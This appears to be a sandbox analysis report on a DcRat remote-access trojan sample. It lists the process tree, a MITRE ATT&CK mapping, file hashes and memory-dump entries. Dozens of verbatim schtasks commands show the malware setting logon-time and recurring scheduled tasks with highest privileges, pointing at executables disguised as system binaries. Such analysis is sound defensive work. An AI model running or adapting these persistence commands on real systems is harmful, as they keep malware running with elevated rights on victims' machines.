schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\es-ES\winlogon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\es-ES\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\es-ES\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\winlogon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Windows\Tasks\services.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\Tasks\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Windows\Tasks\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\spoolsv.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\system\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\system\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Windows\system\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd62" /sc MINUTE /mo 14 /tr "'C:\Windows\ModemLogs\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6" /sc ONLOGON /tr "'C:\Windows\ModemLogs\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd62" /sc MINUTE /mo 12 /tr "'C:\Windows\ModemLogs\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\en-US\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\services.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Desktop\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default\Desktop\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Desktop\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files\Internet Explorer\it-IT\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\it-IT\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\it-IT\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe

Filesize
1.2MB

MD5
bcf67a2db07e66ae019cf4f0ed9d7039

SHA1
75824770067cb95b9d5995e281f095c9a0e7201d

SHA256
731be3d31da0808f4ccfab9167c83f61d4d4784da6ef38827fb0019cefdfdfc8

SHA512
9de044c254491bbf896e51343921aaed010833c0488deeb27bbb9d711a29842c6ac0fcab635d374e2d53633f013a0a0d1301af85a69d5a21939a9e64a18aacea

Download Submit
C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe

Filesize
1.2MB

MD5
0bbdc65eeda52cf816f70ab39542f0f4

SHA1
6275615179a44ce7283e8dff7f3e981d63aee3e0

SHA256
c1ec25b40e7e7f2cbb4e9aa12185c828ba2f59981c7310b9bb346649eb258514

SHA512
68ed14c0695bf44e6194ae76f340fc98063fef5599af3ea295cda95aeeedef3ef476c6e0b7f382f942b34a08528a0c11271a3286eaeb89bde86c42309a80f652

Download Submit
C:\Users\Admin\AppData\Local\Temp\vmrgCp0lFx.bat

Filesize
194B

MD5
5bc33fe8a7b645cbf4923c7512eb5073

SHA1
fae13ce3bcf057410d85620a5051c2d96fc27199

SHA256
b3fe35fe2653b8da9d1edb5e52bc3419e89e9069aa0b8c72db00334bdbbec860

SHA512
3492dffb0a6b9f6a69b7cccb1529b00712193bbef217bc75b91f680337350e495f83406547480d3bb3c5f330055ad78f0738a4541024b0f6cc3f72a4a082dab5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b3384af883d709e070797518c727180d

SHA1
2140c29e66f566a5c4b9e7671ce211e9fcc89d2c

SHA256
c24a16ae4ddb489a34b7feaccd9716988590de611ce2197573b323f3acc85f15

SHA512
c8e405a37f65ade82acffe73a49a273ffde8f5f892b8af68b328595d81ec03b1679d7898701e64fbb940311c0bf59902f528b6c845ac38e7bc91057e3a396ac3

Download Submit
C:\Windows\Tasks\services.exe

Filesize
1.2MB

MD5
34fbfe6c94ec91791bcacb16e3f52d16

SHA1
66ef726c6f9de57e59b9de50182b6c34760b355f

SHA256
7d9695d174b6de4cc8ae98e60c73fca6041ed5ff7c7ea9fc9500230d89769733

SHA512
94afc165609eef7cb38b4330133277c29093c3b6afecb30e6d9f7fa4dc71ac1814ece52728ec2a6822df6ec6a92a1f555984d4ed6fd3b5aefe6392dd0bfebbb4

Download Submit
C:\Windows\Tasks\services.exe

Filesize
1.2MB

MD5
477211148933cc41d67087078f70cd58

SHA1
3a931ffa7e536bd381c5fb46ebb5fd93b05bb2ec

SHA256
2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6

SHA512
76396f20ca86c749a14510c8ae2ab03042867127956e1aacc5765c933471e1987b759122f2d90c1b87392d26e12329519dfac8b0a19692c0ec07288190a91cda

Download Submit
memory/2296-12-0x0000000000570000-0x000000000057C000-memory.dmp

Filesize
48KB

Download
memory/2296-5-0x00000000004F0000-0x00000000004F8000-memory.dmp

Filesize
32KB

Download
memory/2296-8-0x0000000000530000-0x000000000053C000-memory.dmp

Filesize
48KB

Download
memory/2296-9-0x0000000000540000-0x0000000000548000-memory.dmp

Filesize
32KB

Download
memory/2296-10-0x0000000000550000-0x000000000055C000-memory.dmp

Filesize
48KB

Download
memory/2296-11-0x0000000000560000-0x0000000000568000-memory.dmp

Filesize
32KB

Download
memory/2296-0-0x000007FEF5AF3000-0x000007FEF5AF4000-memory.dmp

Filesize
4KB

Download
memory/2296-13-0x0000000000580000-0x000000000058C000-memory.dmp

Filesize
48KB

Download
memory/2296-6-0x0000000000500000-0x0000000000508000-memory.dmp

Filesize
32KB

Download
memory/2296-7-0x0000000000510000-0x000000000051A000-memory.dmp

Filesize
40KB

Download
memory/2296-4-0x00000000004E0000-0x00000000004F0000-memory.dmp

Filesize
64KB

Download
memory/2296-140-0x000007FEF5AF3000-0x000007FEF5AF4000-memory.dmp

Filesize
4KB

Download
memory/2296-155-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

Filesize
9.9MB

Download
memory/2296-3-0x00000000004D0000-0x00000000004D8000-memory.dmp

Filesize
32KB

Download
memory/2296-1-0x0000000000820000-0x0000000000952000-memory.dmp

Filesize
1.2MB

Download
memory/2296-2-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

Filesize
9.9MB

Download
memory/2296-182-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

Filesize
9.9MB

Download
memory/2832-180-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

Filesize
2.9MB

Download
memory/2944-181-0x0000000002690000-0x0000000002698000-memory.dmp

Filesize
32KB

Download
memory/2960-226-0x0000000001180000-0x00000000012B2000-memory.dmp

Filesize
1.2MB

Download